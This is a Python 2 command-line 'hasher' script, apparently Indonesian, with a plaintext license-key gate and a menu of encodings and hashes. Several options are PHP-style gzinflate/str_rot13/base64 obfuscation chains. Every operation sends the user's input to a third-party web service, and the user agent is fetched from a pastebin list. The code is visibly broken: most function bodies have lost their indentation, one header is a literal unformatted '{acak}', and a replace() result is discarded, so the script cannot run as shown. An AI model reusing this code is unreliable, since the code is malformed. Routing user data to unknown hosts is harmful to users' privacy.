    print '\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97'
    print '\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91\x1b[32m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x97\x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91 \x1b[32m\xe2\x96\x88\xe2\x96\x88\x1b[31m\xe2\x95\x91'
    print '\x1b[31m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d'
    print ' \x1b[31m[\x1b[37mAuthor\x1b[31m]=[ \x1b[36mRizky ID'
    print ' \x1b[31m[\x1b[37mCreate\x1b[31m]=[ \x1b[36m8 April 2020'
    print ' \x1b[31m[\x1b[37mFungsi\x1b[31m]=[ \x1b[36mEncrypt/Decrypt'
    print '\x1b[37m==============================================='
# Main-menu text: options 01-24 (hash/encoding operations) plus the
# C (chat admin), F (follow admin) and E (exit) actions.
ban = '\n\x1b[37m{\x1b[31m01\x1b[37m} \x1b[32mURL\n\x1b[37m{\x1b[31m02\x1b[37m} \x1b[32mBASE64\n\x1b[37m{\x1b[31m03\x1b[37m} \x1b[32mCONFERT_UU\n\x1b[37m{\x1b[31m04\x1b[37m} \x1b[32mJSON\n\x1b[37m{\x1b[31m05\x1b[37m} \x1b[32mGZINFLATE - BASE64\n\x1b[37m{\x1b[31m06\x1b[37m} \x1b[32mSTR_ROT13 - BASE64\n\x1b[37m{\x1b[31m07\x1b[37m} \x1b[32mSTR_ROT13 - GZINFLATE - BASE64\n\x1b[37m{\x1b[31m08\x1b[37m} \x1b[32mGZINFLATE - STR_ROT13 - BASE64\n\x1b[37m{\x1b[31m09\x1b[37m} \x1b[32mGZINFLATE - STR_ROT13 - GZINFLATE - BASE64\n\x1b[37m{\x1b[31m10\x1b[37m} \x1b[32mSTR_ROT13 - CONVERT_UU - URL - GZINFLATE -\n\x1b[37m \x1b[32mSTR_ROT13 - BASE64 - CONVERT_UU - GZINFLATE -\n \x1b[37m \x1b[32mURL - STR_ROT13 - GZINFLATE - BASE64\n\x1b[37m{\x1b[31m11\x1b[37m} \x1b[32mSTR_ROT13 - GZINFLATE - STR_ROT13 - BASE64\n\x1b[37m{\x1b[31m12\x1b[37m} \x1b[32mBASE64 - GZINFLATE - STR_ROT13 - CONVERT_UU -\n \x1b[37m \x1b[32mGZINFLATE - BASE64\n\x1b[37m{\x1b[31m13\x1b[37m} \x1b[32mHEX ENCODE-DECODE\n\x1b[37m{\x1b[31m14\x1b[37m} \x1b[32mMD5 HASH\n\x1b[37m{\x1b[31m15\x1b[37m} \x1b[32mSHA1 HASH\n\x1b[37m{\x1b[31m16\x1b[37m} \x1b[32mROT13 HASH\n\x1b[37m{\x1b[31m17\x1b[37m} \x1b[32mSTRLEN\n\x1b[37m{\x1b[31m18\x1b[37m} \x1b[32mUNESCAPE\n\x1b[37m{\x1b[31m19\x1b[37m} \x1b[32mCHAR AT\n\x1b[37m{\x1b[31m20\x1b[37m} \x1b[32mCHR - BIN2HEX - SUBSTR\n\x1b[37m{\x1b[31m21\x1b[37m} \x1b[32mCHR\n\x1b[37m{\x1b[31m22\x1b[37m} \x1b[32mHTMLSPECIALCHARS\n\x1b[37m{\x1b[31m23\x1b[37m} \x1b[32mESCAPE\n\x1b[37m{\x1b[31m24\x1b[37m} \x1b[32mAUTO HASH\n\x1b[37m===============================================\n\x1b[31m[\x1b[37mC\x1b[31m]=[ \x1b[35mCHAT ADMIN\n\x1b[31m[\x1b[37mF\x1b[31m]=[ \x1b[35mFOLLOW ADMIN\n\x1b[31m[\x1b[37mE\x1b[31m]=[ \x1b[31mEXIT PROGRAM\n\x1b[37m===============================================\n'
def main():
os.system('clear')
main1()
print ban
pilih = raw_input('%s >>>>%s ' % (biru, hijau))
if pilih == '1' or pilih == '01':
e1()
elif pilih == '2' or pilih == '02':
e2()
elif pilih == '3' or pilih == '03':
e3()
elif pilih == '4' or pilih == '04':
e4()
elif pilih == '5' or pilih == '05':
e5()
elif pilih == '6' or pilih == '06':
e6()
elif pilih == '7' or pilih == '07':
e7()
elif pilih == '8' or pilih == '08':
e8()
elif pilih == '9' or pilih == '09':
e9()
elif pilih == '10':
e10()
elif pilih == '11':
e11()
elif pilih == '12':
e12()
elif pilih == '13':
e13()
elif pilih == '14':
e14()
elif pilih == '15':
e15()
elif pilih == '16':
e16()
elif pilih == '17':
e17()
elif pilih == '18':
e18()
elif pilih == '19':
e19()
elif pilih == '20':
e20()
elif pilih == '21':
e21()
elif pilih == '22':
e22()
elif pilih == '23':
e23()
elif pilih == '24':
auto()
elif pilih == 'C' or pilih == 'c':
print
chat = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mIsi pesan mu : ')
chat.replace(' ', '%20')
spin()
sp.check_output(['am', 'start', 'https://api.whatsapp.com/send?phone=6288261764938&text=HASHER : ' + chat + ''])
main()
elif pilih == 'F' or pilih == 'f':
os.system('xdg-open https://www.instagram.com/riski_1504')
sys.exit()
elif pilih == 'E' or pilih == 'e':
print '%s(%s!%s) %sKeluar' % (putih, merah, putih, merah)
sys.exit()
def muat():
    """Fake 'connecting' progress indicator counting from 1% to 100%."""
    print
    # Generate '1'..'100' instead of the original hand-written
    # 100-element string list -- identical values in identical order.
    for b in [str(i) for i in range(1, 101)]:
        sys.stdout.write('\r' + putih + '[' + cyan + '#' + putih + ']' + putih + ' Sedang Menghubungkan' + merah + ' [' + hijau + b + putih + '%' + merah + ']')
        sys.stdout.flush()
        time.sleep(0.1)
    time.sleep(0.1)
def pilih():
os.system('clear')
print licen
mana = raw_input('\n%s(%s!%s)%s Masukan License%s :%s ' % (putih, merah, putih, putih, merah, hijau))
if mana == '':
print '%s(%s!%s)%s Jangan Kosong' % (putih, merah, putih, merah)
pilih()
elif mana in ('mikuna5bq2kuu', 'Abogabegaefi1y3'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('pinajquaqjuabb', 'macet52aaremkunek'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('kahwbwbana77ahwg', 'piquennadrakqma147aa'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('ajagagahahavqgayag', 'jakamwnabagajuquaiw9'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('aiqiqnabah181jq17', 'hahquw72j18qjq8q'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('jahafw71816262baha5', 'jajwhqha618191gwgw6j'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('jauwiw816w5wywhwbwgqu', 'jayayqiqkqbagauqj'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('quqiaha8172baiq9', 'kauqiqnaba17q9qb'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('riski_1504instagram', 'rizkyganz1504kahquah'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('iakwajaahwggwhaa817oqja', 'facebookrizkyid111'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('===bwjabase64ajaagja', 'baagbav-base64baf=='):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('mueheheheeh525y2qgqh', 'makanyajangangoblokxxx'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('ahyauqhwha6w8qhagagi', 'aajaba7w52uabw8wh'):
muat()
print '\n %s>>>>> %sLICENSE OK %s<<<<<' % (biru, hijau, biru)
time.sleep(2)
main()
elif mana in ('A', 'a'):
print
chat = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mIsi pesan mu : ')
chat.replace(' ', '%20')
spin()
sp.check_output(['am', 'start', 'https://api.whatsapp.com/send?phone=6288261764938&text=HASHER : ' + chat + ''])
main()
else:
muat()
print '\n %s>>>>>%s License Wrong%s <<<<<' % (biru, merah, biru)
time.sleep(2)
pilih()
def enc(hash, tp, tipe):
spin()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
dat = {'mbutt': hash, 'ope': tp, 'submit': tipe}
a = requests.post('http://tools-ixid.ga/enc-dec.php', headers={'User-Agent': '{acak}'}, data=dat)
b = bs(a.content, 'html.parser')
c = b.find_all('textarea')[1]
d = c.text
print '\n\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult : ' + d
print
raw_input('\n\x1b[32m [ \x1b[31menter to back menu \x1b[32m] ')
main()
def dec(hash, tp, tipe):
spin()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
dat = {'mbutt': hash, 'ope': tp, 'crack': tipe}
a = requests.post('http://tools-ixid.ga/enc-dec.php', headers={'User-Agent': '{acak}'}, data=dat)
b = bs(a.content, 'html.parser')
c = b.find_all('textarea')[1]
d = c.text
print '\n\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult : ' + d
print
raw_input('\n\x1b[32m [ \x1b[31menter to back menu \x1b[32m] ')
main()
def e1():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e1()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e1()
tp = 'urlencode'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e1()
tp = 'urlencode'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e1()
def e2():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e2()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e2()
tp = 'base64'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e2()
tp = 'base64'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e2()
def e3():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e3()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e3()
tp = 'ur'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e3()
tp = 'ur'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e3()
def e4():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e4()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e4()
tp = 'json'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e4()
tp = 'json'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e4()
def e5():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e5()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e5()
tp = 'gzinflates'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e5()
tp = 'gzinflates'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e5()
def e6():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e6()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e6()
tp = 'str2'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e6()
tp = 'str2'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e6()
def e7():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e7()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e7()
tp = 'gzinflate'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e7()
tp = 'gzinflate'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e7()
def e8():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e8()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e8()
tp = 'gzinflater'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e8()
tp = 'gzinflater'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e8()
def e9():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e9()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e9()
tp = 'gzinflatex'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e9()
tp = 'gzinflatesx'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e9()
def e10():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e10()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e10()
tp = 'gzinflatew'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e10()
tp = 'gzinflatew'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e10()
def e11():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e11()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e11()
tp = 'str'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e11()
tp = 'str'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e11()
def e12():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e12()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e12()
tp = 'url'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e12()
tp = 'url'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e12()
def e13():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e13()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e13()
tp = 'hexencode'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e13()
tp = 'hexencode'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e13()
def e14():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e14()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e14()
tp = 'md5'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e14()
tp = 'md5'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e14()
def e15():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e15()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e15()
tp = 'sha1'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e15()
tp = 'sha1'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e15()
def e16():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e16()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e16()
tp = 'str_rot13'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e16()
tp = 'str_rot13'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e16()
def e17():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e17()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e17()
tp = 'strlen'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e17()
tp = 'strlen'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e17()
def e18():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e18()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e18()
tp = 'xxx'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
